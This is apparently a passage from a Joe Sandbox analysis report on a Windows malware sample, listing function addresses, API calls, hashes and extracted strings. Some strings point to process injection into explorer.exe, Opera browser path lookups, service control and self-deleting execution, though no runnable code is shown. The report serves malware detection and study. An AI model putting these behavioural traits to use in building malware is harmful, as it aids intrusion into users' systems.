                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                                              • String ID: 65535$udp
                                                                                                                                                                                                                                                                                                                              • API String ID: 0-1267037602
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 18155c1335c00501c0bec8b6c43ed7e13bdec9a75575f631fadbade58ebc7fa9
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ed3283d9ee94cadc099f5c83048f767ee72ed986ddea0764ae1f3250d10f5e6e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C411971604301ABD7209F29E9057AB77D8EF85706F04082FF84597391D76DCEC1866E
                                                                                                                                                                                                                                                                                                                              Function 00416E27 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 107filesynchronizationCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                                                                                                              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                                                                                                              • String ID: <$@$@FG$@FG$TUF$Temp
                                                                                                                                                                                                                                                                                                                              • API String ID: 1107811701-4124992407
                                                                                                                                                                                                                                                                                                                              • Opcode ID: ba09caefafd743c57d2e89f58fe8ed5c74fa0c6c6b7b445be49fdf63fe192e58
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 31b483d39f6b5d6935d3c54cd29663daa4ef68f058b88688fc76c4b473729b01
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ba09caefafd743c57d2e89f58fe8ed5c74fa0c6c6b7b445be49fdf63fe192e58
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C318B319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                                                                                                              Function 00406616 Relevance: 17.6, APIs: 2, Strings: 8, Instructions: 98COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00474A48,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\Desktop\17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3694a780.dat-decoded.exe), ref: 00406705
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                                                              • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$pUF$windir$BG3i@
                                                                                                                                                                                                                                                                                                                              • API String ID: 2050909247-1144799832
                                                                                                                                                                                                                                                                                                                              • Opcode ID: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 85e9bb49d37c82d50cc0a876bfe2e9cbcca00efa80d213bdcfc81b1d75d5651e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: df9848ee821d52fd5067d4fed09af5d5a7b0c3927120527d7347017cd794abcf
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FF31CA75240300AFC310AB6DEC49F6A7768EB44705F11443EF50AA76E1EB7998508B6D
                                                                                                                                                                                                                                                                                                                              Function 00439371 Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C9
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393D6
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 004393DD
                                                                                                                                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439409
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439413
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043941A
                                                                                                                                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043945D
                                                                                                                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439467
                                                                                                                                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 0043946E
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0043947A
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00439481
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 2441525078-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6a201652548b5938c51769f65cd316b483991bd1e06270b2389e89ad89b884a4
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA31007280860ABFDF11AFA5DC45CAF3B78EF09364F10416AF81096291DB79CC11DBA9
                                                                                                                                                                                                                                                                                                                              Function 100064B0 Relevance: 16.0, APIs: 2, Strings: 7, Instructions: 249COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,-00000002), ref: 100065F7
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(?,00000006), ref: 10006793
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-3709686828
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 5d2622badbe7d1c6684bfc7606bad391be43c6f73f7f9521380fe3c15421bfe6
                                                                                                                                                                                                                                                                                                                              • Instruction ID: cd525ab1337c3ee21bd27d398b55dee76c9cea0ea90567e5fc089a1fee8f1736
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d2622badbe7d1c6684bfc7606bad391be43c6f73f7f9521380fe3c15421bfe6
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5D917E74D20218AAEF00DFA4DC45BEEBBBAFF48744F204119F406E7295EB75A905CB51
                                                                                                                                                                                                                                                                                                                              Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                                                                                                                                                                                                                              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                                                                                                              • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                                                                                                              • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                                                                                                              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00404468: send.WS2_32(00000278,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                                                                                                              • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                                                                                                              • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 85ce1e49ef39a33b141425ad91aa3b78c7bcb8003ae9ff8e4031fe383a6a9ded
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 321c3fbec734f1f8b9fff4e8d6f05c27936dabaea61c0bf38d797d3438e015d2
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 85ce1e49ef39a33b141425ad91aa3b78c7bcb8003ae9ff8e4031fe383a6a9ded
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F641BEB16043016BC614FB75D85A8AE77A8ABC1714F00093EF906A31E6EF38DA04C79A
                                                                                                                                                                                                                                                                                                                              Function 00419C95 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CA4
                                                                                                                                                                                                                                                                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CBB
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CC8
                                                                                                                                                                                                                                                                                                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CD7
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CE8
                                                                                                                                                                                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419608,00000000,00000000), ref: 00419CEB
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 8f568d79055422364b0fc155fd47d6165a7356d41c75c5dcd4a60a29222dfb7a
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 64b7f8b9d702139b787b45b2ac21df1fde646642379ff803e7b0347eb9faadae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f568d79055422364b0fc155fd47d6165a7356d41c75c5dcd4a60a29222dfb7a
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8711C631901218AFD7116B64EC85DFF3BECDB46BA1B000036F942921D1DB64CD46AAF5
                                                                                                                                                                                                                                                                                                                              Function 00446DDB Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DEF
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446DFB
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E06
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E11
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E1C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E27
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E32
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E3D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E48
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00446E56
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 4059f081e6094245f9dcb18e84e070fbb06f55adf0c09f86c969ccb3ae0415ae
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0E11CB7550051CBFDB05EF55C842CDD3B76EF06364B42C0AAF9086F222DA75DE509B85
                                                                                                                                                                                                                                                                                                                              Function 028359D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028359EA
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: HeapFree.KERNEL32(00000000,00000000,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?), ref: 02835734
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0283571E: GetLastError.KERNEL32(?,?,0283924F,?,00000000,?,00000000,?,02839276,?,00000007,?,?,02837E5A,?,?), ref: 02835746
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 028359F6
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A01
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A0C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A17
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A22
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A2D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A38
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A43
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 02835A51
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 89216c1e2138de03ad294d13ec247ed03cbe036037954b473e9875110df904c3
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 6c4f5eb2dbe82c97fa2a1ac581e92599305f5c2c928d5efd8284282f51dc80f5
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89216c1e2138de03ad294d13ec247ed03cbe036037954b473e9875110df904c3
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0611747E520148EFCB22EF58D941CDD3FA6EF08350B9545A5BA088B225DB35DB509F81
                                                                                                                                                                                                                                                                                                                              Function 1001695C Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016970
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001697C
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016987
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 10016992
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 1001699D
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169A8
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169B3
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169BE
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169C9
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 100169D7
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
